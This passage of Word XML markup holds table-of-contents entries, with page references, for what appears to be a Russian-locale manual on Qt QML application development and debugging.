        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605673 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>351</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74" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:noProof/>
          </w:rPr>
          <w:t>Advanced Application Development Topics</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605674 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>352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75" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Other QML Modules</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605675 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>352</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00385670" w:rsidRPr="00385670" w:rsidRDefault="00385670">
      <w:pPr>
        <w:pStyle w:val="21"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9345"/>
        </w:tabs>
        <w:rPr>
          <w:b w:val="0"/>
          <w:noProof/>
          <w:lang w:val="ru-RU" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc483605676" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:spacing w:val="-15"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Debugging QML Applications</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605676 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>352</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77" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Console API</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605677 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>352</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78" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Log</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605678 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>352</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79" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Assert</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605679 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>352</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80" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Timer</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605680 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>353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81" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Trace</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605681 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>353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82" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Count</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605682 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>353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83" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Profile</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605683 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>353</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00385670" w:rsidRPr="00385670" w:rsidRDefault="00385670">
      <w:pPr>
        <w:pStyle w:val="51"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9345"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:noProof/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc483605684" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Exception</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605684 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>353</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85" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Debugging Module Imports</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605685 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>354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86" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QML Debugging Infrastructure</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605686 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>354</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87" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Enabling the Infrastructure</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605687 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>354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88" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Starting Applications</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605688 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>354</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89" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Connecting to Applications</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605689 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>355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90" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Debugging with Qt Creator</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605690 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>355</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91" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:spacing w:val="-15"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Debugging Qt Quick Projects</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605691 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>355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92" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Setting Up QML Debugging</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605692 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>355</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93" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Mixed C++/QML Debugging</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605693 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>356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94" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Starting QML Debugging</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605694 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>356</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95" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Debugging JavaScript Functions</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605695 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>357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96" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Executing JavaScript Expressions</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605696 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>357</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97" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Applying QML Changes at Runtime</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605697 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>358</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00385670" w:rsidRPr="00385670" w:rsidRDefault="00385670">
      <w:pPr>
        <w:pStyle w:val="31"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9345"/>
        </w:tabs>
        <w:rPr>
          <w:b w:val="0"/>
          <w:noProof/>
          <w:lang w:val="ru-RU" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
